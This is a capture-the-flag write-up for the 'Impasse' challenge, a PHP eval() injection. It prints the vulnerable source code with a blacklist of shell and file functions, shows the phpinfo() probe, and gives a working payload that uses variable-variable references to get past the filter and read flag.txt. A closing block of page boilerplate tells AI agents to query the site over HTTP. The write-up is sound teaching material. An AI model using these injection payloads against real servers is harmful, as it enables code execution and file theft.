# Impasse

This is a PHP `eval()` injection challenge.

When submitting the form, the input is wrapped around an `echo` statement and added to the `print` GET parameter:

```http
?print=echo+'<YOUR DATA>'+;
```

The first thing we tried was to modify the GET parameter to test for arbitrary code execution:

```
print=echo+'';phpinfo()
```

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-f65f398f8be3c0d63a5c24979c3679867c79504f%2Fimage.png?alt=media)

By checking the `debug` option, we are presented with the page's source code. The following code implements the input blacklist and the `eval()` vulnerability:

```php
<?php
error_reporting(0);
if (isset($_GET['print'])) {
  if (!empty($_GET['print'])){
    $printValue= strtolower($_GET['print']);
    $blocked = array("cat", "more" ,"readfile", "fopen", "file_get_contents", "file", "SplFileObject" );
    $special_block= "nc";
    $$special_block= "../flag.txt";
    foreach ($blocked as $value) {
      if (strpos($printValue, $value) || preg_match('/\bsystem|\bexec|\bbin2hex|\bassert|\bpassthru|\bshell_exec|\bescapeshellcmd| \bescapeshellarg|\bpcntl_exec|\busort|\bpopen|\bflag\.txt|\bspecial_block|\brequire|\bscandir|\binclude|\bhex2bin|\$[a-zA-Z]|[#!%^&*_+=\-,\.:`|<>?~\\\\]/i', $printValue)) {
        $printValue="";
        echo "<script>alert('Bad character/word ditected!');</script>";
        break;
      }
    }
  eval($printValue . ";");
  } 
}
?>
```

Many useful functions have been blocked! But note that the `eval()` statement is called *after* the `$blocked`, `$special_block` and `$$special_block` variables are defined. This allows us to reference these variables in our `eval`-ed code.

Note that `$$` has a special meaning in PHP: <https://stackoverflow.com/questions/4169882/what-is-in-php>

```php
$foo = 'hello';
$hello = 'The Output';
echo $$foo; // displays "The Output"
```

What happens here is that the value of `$foo` is used as a variable name, and so `$$foo` becomes `$hello` (think of it as replacing `$foo` in `$$foo`).

```php
$special_block= "nc";
$$special_block= "../flag.txt";
```

Here, the value of `$special_block` is used as a variable name. The second line defines a new variable, `$nc`, which has the value of `"../flag.txt"`.

Our final payload is

```
?print=echo+'';print(eval('return ${blocked}[4](${nc});'))
```

which leads to the following code being `eval`-ed:

```php
print(eval('return file_get_contents("../flag.txt");')
```

Note that `$[a-zA-Z]` is blocked in the regex, so we must use `${...}` instead (which achieves the same purpose). Also, `eval()` executes `file_get_contents("../flag.txt")` but doesn't display anything to us yet. By returning and printing the output, we retrieve the flag.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ctf.zeyu2001.com/2021/typhooncon-ctf-2021/impasse.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.